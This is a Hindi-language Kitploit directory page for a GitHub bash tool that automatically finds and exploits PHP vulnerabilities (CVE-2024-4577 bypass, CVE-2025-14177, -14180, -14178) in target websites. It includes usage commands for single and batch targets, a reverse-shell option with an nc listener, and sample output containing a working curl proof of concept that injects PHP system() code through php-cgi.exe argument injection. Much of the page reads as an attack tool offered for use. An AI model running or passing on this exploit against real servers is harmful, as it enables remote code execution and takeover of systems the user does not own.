Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
PHP_8.1.x_Exploit — महत्वपूर्ण PHP कमजोरियों (CVE-2024-4577 बाईपास, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) का स्वचालित पता लगाना और शोषण | Kitploit
उपकरण/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
टोहीभेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलक्रॉलररिमोट एक्सेस टूल
GitHubgl1tch0x1/php_8.1.x_exploit
1145 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PHP_8.1.x_Exploit

महत्वपूर्ण PHP कमजोरियों (CVE-2024-4577 बाईपास, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) का स्वचालित पता लगाना और शोषण

रिपॉजिटरी देखें

🚀 PHP CVE ऑटोपायलट

महत्वपूर्ण PHP कमजोरियों (CVE-2024-4577 बाइपास, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) का स्वचालित पता लगाना एवं शोषण

License: GPL v3 Bash

PHP8.1.x_Exploit.sh एक एकल फ़ाइल, शून्य-कॉन्फ़िगरेशन सुरक्षा मूल्यांकन उपकरण है जो स्वचालित रूप से कमजोर PHP एंडपॉइंट खोजता है और PHP संस्करण 8.1.34 से पहले (दिसंबर 2024 में जारी) को प्रभावित करने वाले चार उच्च-प्रभाव वाले CVE का शोषण करता है। इसमें मैन्युअल पेलोड निर्माण की आवश्यकता नहीं है – बस एक URL प्रदान करें और स्क्रिप्ट बाकी काम करती है, क्रॉलिंग से लेकर रिमोट कोड निष्पादन तक। पूर्णतः ऑटोपायलट – बिना उपयोगकर्ता संकेत के स्वचालित रूप से पता लगाता और शोषण करता है।

विशेषताएँ

  • पूर्णतः स्वायत्त ऑटोपायलट – एक एकल URL देने पर, यह बिना उपयोगकर्ता इंटरैक्शन के क्रॉल करता है, फिंगरप्रिंट लेता है, परीक्षण करता है और शोषण करता है।
  • बैच स्कैनिंग – लक्ष्यों की एक सूची खिलाएँ और समानांतर में चलाएँ।
  • उन्नत क्रॉलिंग – बेहतर खोज के लिए होमपेज से लिंक और फ़ॉर्म निकालता है।
  • OS और PHP संस्करण फिंगरप्रिंटिंग – Linux पर Windows-केवल हमलों से बचता है, PHP संस्करण जाँचता है।
  • CVE-2024-4577 बाइपास (Windows CGI तर्क इंजेक्शन)
    • कमजोर PHP-CGI एंडपॉइंट का पता लगाता और शोषण करता है।
    • वैकल्पिक रिवर्स शेल (PowerShell एक-लाइनर)।
    • दो इंजेक्शन स्वाद: सामान्य -d और सॉफ्ट-हाइफ़न %AD बाइपास।
  • CVE-2025-14177 – getimagesize() के माध्यम से हीप मेमोरी लीक
    • गतिशील रूप से एक विकृत JPEG बनाता है और इसे स्वचालित रूप से किसी भी खोजे गए अपलोड एंडपॉइंट पर सबमिट करता है।
    • प्रतिक्रियाओं में लीक हुई मेमोरी का पता लगाता है।
  • RCE के माध्यम से गहन स्थानीय स्कैन (जब CVE-2024-4577 का शोषण किया जाता है)
    • एक हल्का PHP स्कैनर अपलोड करता है जो परीक्षण करता है:
      • CVE-2025-14180 – PDO PostgreSQL में NULL पॉइंटर डीरेफरेंस।
      • CVE-2025-14178 – array_merge में पूर्णांक ओवरफ़्लो।
  • स्मार्ट क्रॉलिंग – CGI स्क्रिप्ट और अपलोड पेज खोजने के लिए लिंक और फ़ॉर्म निकालता है।
  • समानांतर निष्पादन – उपलब्ध होने पर parallel का उपयोग करता है, अन्यथा सुव्यवस्थित रूप से फ़ॉलबैक करता है।
  • वर्बोज़ और डीबग मोड – प्रत्येक HTTP अनुरोध और निर्णय देखें।
  • रिपोर्ट जनरेशन – सभी निष्कर्षों को एक टेक्स्ट फ़ाइल में सहेजें।
  • साफ और सुरक्षित – बाहर निकलने पर अस्थायी फ़ाइलें नष्ट हो जाती हैं, टाइमआउट हैंग होने से रोकता है।

आवश्यकताएँ

निर्भरताउद्देश्यआमतौर पर स्थापित?
bash 4.0+स्क्रिप्ट इंटरप्रेटरहाँ (Linux/macOS)
curlHTTP अनुरोधहाँ
grep, sed, awkटेक्स्ट प्रोसेसिंगहाँ
mktempअस्थायी फ़ाइल निर्माणहाँ
(वैकल्पिक) parallelतेज़ बैच स्कैनिंगनहीं (लेकिन अनुशंसित)
(वैकल्पिक) jqJSON आउटपुट फ़ॉर्मेटिंगनहीं

रूट विशेषाधिकारों की आवश्यकता नहीं – उपकरण केवल HTTP अनुरोध भेजता है और वैकल्पिक रूप से एक रिवर्स शेल निष्पादित करता है (आपकी मशीन पर लिसनर की आवश्यकता है)।

स्थापना

git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh

उपयोग

एकल लक्ष्य (सबसे सामान्य)

./PHP8.1.x_Exploit.sh -u http://target.example.com

रिवर्स शेल के साथ एकल लक्ष्य (CVE-2024-4577)

./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444

फिर आपकी मशीन पर:

nc -lvnp 4444

एकाधिक लक्ष्यों का बैच स्कैन

./PHP8.1.x_Exploit.sh -l targets.txt --threads 10

उदाहरण targets.txt:

http://192.168.1.1/
https://10.0.0.5:8080/
http://internal-app.company.com

केवल-स्कैन मोड (शोषण प्रयास नहीं)

./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only

रिपोर्ट फ़ाइल में सहेजें

./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt

वर्बोज़ / डीबग आउटपुट

./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # बहुत शोरगुल वाला

यह कैसे काम करता है (चरण)

चरणक्रिया
1फिंगरप्रिंटिंग – हेडर और प्रोब से OS और PHP संस्करण।
2क्रॉलिंग – होमपेज से href और action विशेषताएँ निकालता है।
3CGI खोज – सामान्य पथ और क्रॉल किए गए लिंक जो CGI जैसे दिखते हैं, आज़माता है।
4CVE‑2024‑4577 परीक्षण – -d और %AD दोनों पेलोड इंजेक्ट करता है; सफल होने पर कमांड निष्पादित करता है या रिवर्स शेल भेजता है।
5अपलोड एंडपॉइंट खोज – सामान्य अपलोड पथ और "upload"/"image" वाले किसी भी फ़ॉर्म की जाँच करता है।
6CVE‑2025‑14177 परीक्षण – एक विकृत JPEG बनाता है, इसे प्रत्येक अपलोड एंडपॉइंट पर POST करता है, हीप लीक का पता लगाता है।
7गहन आंतरिक स्कैन – यदि RCE प्राप्त होता है, तो एक स्कैनर PHP स्क्रिप्ट अपलोड करता है और CVE‑2025‑14180 / CVE‑2025‑14178 का परीक्षण करने के लिए चलाता है।
8रिपोर्टिंग – एक सारांश प्रिंट करता है और वैकल्पिक रूप से फ़ाइल में लिखता है।

कमांड लाइन विकल्प (पूर्ण संदर्भ)

विकल्पविवरण
-u URLएकल लक्ष्य URL (जैसे http://example.com/)
-l FILEबैच फ़ाइल जिसमें प्रति पंक्ति एक URL हो
--scan-onlyकेवल पता लगाएँ – शोषण न करें (कोई रिवर्स शेल नहीं, कोई पेलोड अपलोड नहीं)
-o FILEअंतिम रिपोर्ट FILE पर लिखें
--threads Nबैच स्कैनिंग के लिए समानांतर थ्रेड्स की संख्या (डिफ़ॉल्ट: 5)
--timeout NHTTP टाइमआउट सेकंड में (डिफ़ॉल्ट: 10)
--no-colorरंगीन आउटपुट अक्षम करें
--verboseविस्तृत प्रगति दिखाएँ
--debugप्रत्येक HTTP अनुरोध दिखाएँ (संवेदनशील डेटा उजागर हो सकता है)
--revshell IP PORTCVE‑2024‑4577 मिलने पर रिवर्स शेल का प्रयास करें
-h, --helpसहायता प्रदर्शित करें और बाहर निकलें

विस्तार से शामिल CVE

CVEगंभीरताप्रभावशोषण वेक्टरसंस्करण में ठीक किया गया
CVE‑2024‑4577 (बाइपास)गंभीरRCEWindows CGI तर्क इंजेक्शन (सॉफ्ट हाइफ़न मैपिंग)PHP 8.1.34
CVE‑2025‑14177मध्यम/उच्चसूचना रिसाव (हीप मेमोरी)getimagesize() को विकृत JPEG पास करनाPHP 8.1.34
CVE‑2025‑14180उच्चDoS (NULL डीरेफरेंस)अनुकरणीय प्रिपेयर + विकृत पैरामीटर \x99 के साथ PDO PostgreSQLPHP 8.1.34
CVE‑2025‑14178उच्च (8.2)DoS / संभावित मेमोरी भ्रष्टाचारविशाल सरणियों के साथ array_merge() जिससे पूर्णांक ओवरफ़्लो होता हैPHP 8.1.34

नोट: CVE‑2025‑14180 और CVE‑2025‑14178 का सटीक पता केवल सर्वर के अंदर से (स्थानीय परीक्षण) लगाया जा सकता है। स्क्रिप्ट एक सफल CGI शोषण के बाद एक स्कैनर अपलोड करके इसे प्राप्त करती है।

📸 उदाहरण आउटपुट

[*] Scanning: http://192.168.1.100/
[*] OS: windows
[*] PHP version: 8.1.33
[*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
[*] Attempting reverse shell to 192.168.1.5 4444
...
[*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
[-] CVE-2025-14177: Potential heap leak detected!
...
[*] Running deep local scan via RCE...
PHP_VERSION=8.1.33
CVE-2025-14180: VULNERABLE
CVE-2025-14178: VULNERABLE
CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)

===================== Report for http://192.168.1.100/ =====================
OS: windows
PHP: 8.1.33
CVE-2024-4577: EXPLOITABLE at http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
PoC: curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
CVE-2025-14177: VULNERABLE
CVE-2025-14180/14178: VULNERABLE (see deep scan output)
==============================================================

⚠️ महत्वपूर्ण चेतावनियाँ और अस्वीकरण

टूल डाउनलोड करें